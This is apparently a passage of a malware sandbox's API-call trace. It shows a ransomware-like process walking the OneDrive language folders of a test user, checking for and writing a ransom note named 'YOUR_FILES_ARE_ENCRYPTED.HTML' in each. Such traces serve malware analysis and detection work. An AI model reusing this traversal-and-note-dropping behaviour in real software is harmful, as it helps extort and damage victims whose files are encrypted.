ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8470dd37, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8470dd37, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ig-ng", cAlternateFileName="")) returned 1 [0113.608] StrStrIW (lpFirst="ig-ng", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.608] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ig-ng") returned 81 [0113.608] GetProcessHeap () returned 0x600000 [0113.608] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.608] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ig-ng" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ig-ng") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ig-ng" [0113.608] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ig-ng", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ig-ng\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ig-ng\\*" [0113.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ig-ng\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8470dd37, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8470dd37, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x848b1595, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.608] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8470dd37, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8470dd37, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x848b1595, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.609] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x848b1595, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x848b1595, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8494a1db, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x138c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.609] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.609] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ig-ng\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.609] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.609] lstrlenW (lpString=".mui") returned 4 [0113.609] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.609] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x848b1595, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x848b1595, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8494a1db, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x138c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.609] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.609] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ig-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.609] GetProcessHeap () returned 0x600000 [0113.609] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ig-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ig-ng\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.609] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.610] CloseHandle (hObject=0x330) returned 1 [0113.610] GetProcessHeap () returned 0x600000 [0113.610] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.610] GetProcessHeap () returned 0x600000 [0113.610] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.610] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2dd71af, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd2dd71af, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd2dd71af, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="is", cAlternateFileName="")) returned 1 [0113.610] StrStrIW (lpFirst="is", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.610] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\is") returned 78 [0113.610] GetProcessHeap () returned 0x600000 [0113.610] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.610] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\is" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\is") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\is" [0113.610] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\is", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\is\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\is\\*" [0113.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\is\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2dd71af, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd2dd71af, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd3229861, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.611] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2dd71af, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd2dd71af, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd3229861, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.611] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3229861, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd3229861, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd348bddc, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.611] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.611] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\is\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.611] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.611] lstrlenW (lpString=".mui") returned 4 [0113.611] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.611] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3229861, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd3229861, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd348bddc, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.611] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.611] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.611] GetProcessHeap () returned 0x600000 [0113.611] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\is\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.611] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.612] CloseHandle (hObject=0x330) returned 1 [0113.612] GetProcessHeap () returned 0x600000 [0113.612] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.612] GetProcessHeap () returned 0x600000 [0113.612] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.612] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3524796, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd3524796, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd3524796, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="it", cAlternateFileName="")) returned 1 [0113.612] StrStrIW (lpFirst="it", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.612] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\it") returned 78 [0113.612] GetProcessHeap () returned 0x600000 [0113.612] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.612] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\it" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\it") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\it" [0113.612] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\it", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\it\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\it\\*" [0113.613] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\it\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3524796, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd3524796, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd381f2ce, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626978 [0113.613] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3524796, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd3524796, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd381f2ce, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.613] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd381f2ce, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd381f2ce, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd3bd92cf, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.613] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.613] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\it\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.613] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.613] lstrlenW (lpString=".mui") returned 4 [0113.613] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.613] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd381f2ce, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd381f2ce, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd3bd92cf, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.613] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0113.613] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.613] GetProcessHeap () returned 0x600000 [0113.613] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\it\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.613] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.614] CloseHandle (hObject=0x330) returned 1 [0113.615] GetProcessHeap () returned 0x600000 [0113.615] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.615] GetProcessHeap () returned 0x600000 [0113.615] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.615] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd40052e7, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd40052e7, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd40052e7, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ja", cAlternateFileName="")) returned 1 [0113.615] StrStrIW (lpFirst="ja", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.615] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ja") returned 78 [0113.615] GetProcessHeap () returned 0x600000 [0113.615] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.615] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ja" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ja") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ja" [0113.615] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ja", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ja\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ja\\*" [0113.615] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ja\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd40052e7, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd40052e7, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd47784b2, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.615] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd40052e7, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd40052e7, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd47784b2, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.615] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd47784b2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd47784b2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd4a7342a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0xfcc0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.615] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.615] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ja\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.615] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.615] lstrlenW (lpString=".mui") returned 4 [0113.615] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.615] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd47784b2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd47784b2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd4a7342a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0xfcc0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.615] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.615] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.615] GetProcessHeap () returned 0x600000 [0113.616] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ja\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.616] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.617] CloseHandle (hObject=0x330) returned 1 [0113.617] GetProcessHeap () returned 0x600000 [0113.617] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.617] GetProcessHeap () returned 0x600000 [0113.617] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.617] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd80fd0fc, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd80fd0fc, ftLastAccessTime.dwHighDateTime=0x1d70073, 